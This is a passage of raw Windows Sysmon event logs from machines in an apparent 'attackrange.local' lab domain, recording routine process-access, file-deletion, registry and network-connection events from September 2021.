09:25:01.634{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8DED-6151-C000-00000000FD01}5100C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057006Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.634{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057005Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.634{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057004Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.634{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057003Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.634{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057002Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.634{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8DED-6151-BF00-00000000FD01}5208C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057001Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.634{5EBD8912-8CC0-6151-1600-00000000FD01}12961772C:\Windows\system32\svchost.exe{5EBD8912-8DED-6151-BF00-00000000FD01}5208C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e0a4|c:\windows\system32\UBPM.dll+11662|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b55|C:\Windows\SYSTEM32\ntdll.dll+6585d|C:\Windows\SYSTEM32\ntdll.dll+656c0|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057000Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.634{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056999Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.634{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001057047Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:02.821{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=4BADB84549E7AB6D1913659FBCF2A15F,SHA256=EA16CB7BE7CA491A8F24A1D41303F9C8E887D41A830828EA8AC888184A37810B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057046Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:02.821{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C0F2CB8045796FC195B73004740B3262,SHA256=2E6EBBB858E0984D657AF8DE2CF2D613C67FB34903E6183E3AD488E3A84B712C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981522Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:02.738{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7831802329BF62EAC6ACCACC3B26E61,SHA256=BB2D0E08A378C38C6E7846CB9B01AACAD3A716346FFA62A76F516F9BF97DDF94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057045Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:02.774{5EBD8912-8CC0-6151-1600-00000000FD01}1296NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml~RF52a05.TMPMD5=82B5BF82F1BD5C60EE3F29040E34EF84,SHA256=4D99C25E4C1D9AC9D77599D773107B6065899E4212E2371B2775A6B110EBE87C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057044Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:02.727{5EBD8912-8CC0-6151-1600-00000000FD01}1296NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml~RF529d6.TMPMD5=AB7638DD11F080BF5C4B5FA4166AC97B,SHA256=EB384573BED2F36946ECDC55F01984C2F2B43EA7C0BEFCF7EB1621A288C48D00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057043Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:02.681{5EBD8912-8CC0-6151-1600-00000000FD01}1296NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml~RF529a7.TMPMD5=B653EE92090B5D8A8F150129922FA31C,SHA256=E3A9E2C39DF016B6675FDF974DC5EAF34D9988D386AB89A36A07E33B8E4469A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057042Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:02.649{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5BF6F3159C1735501BA17EB83032AEB3,SHA256=078EF388FE6FEEC2EFDB5BA580663DC63690F173CCD18F429B95294BD0E5F54B,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001057041Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:25:02.540{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x80000000000000001057040Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:25:02.540{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0005291b) 13241300x80000000000000001057039Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:25:02.540{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b379-0x2ac95db3) 13241300x80000000000000001057038Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:25:02.540{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b381-0x8c8dc5b3) 13241300x80000000000000001057037Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:25:02.540{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b389-0xee522db3) 10341000x80000000000000001057036Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:02.290{5EBD8912-8CC0-6151-1400-00000000FD01}10401656C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057035Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:02.102{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057034Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:02.102{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057033Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:02.102{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057032Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:02.102{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057031Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:02.102{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057030Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:02.102{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057029Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:02.102{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000981521Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:02.300{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED15B73550811A0B474A4E1C87FC9495,SHA256=CF062F6A28229485A8678EEF29691BE40C08EB96E2F737B2B518F45BD02098E6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981520Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:59.150{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de64581-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981524Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:03.742{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAFA6825585FE40F8FAA48A02E159693,SHA256=A0E04E9B632BAB6627FEC494D8CF4D1AE007AC0D8B281EE7E06B0C1A7E95EFEB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057050Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:02.171{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local63989- 23542300x80000000000000001057049Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:03.825{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66BAB13E6A38797CB31D7FBCC41DA887,SHA256=BF903C16796123DEAB85A220A2416CABED549308A8A26425D2FEFA5AE190B9F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057048Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:03.153{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1C2C978966677C18D1FEB209C5C0EAB,SHA256=F3F8AE242080EA07AB4795F771285411B71003C7C43DF264820117A96D194E69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981523Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:03.726{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F83163AE8CB527A89C6D4A805E05A64,SHA256=A55354BAD5BECCAE1EB0EAA1E6A37B43FEBBBC63B85636F96EF134CE03E94111,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057055Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:03.144{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54257-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001057054Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:02.471{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\System32\svchost.exeNT 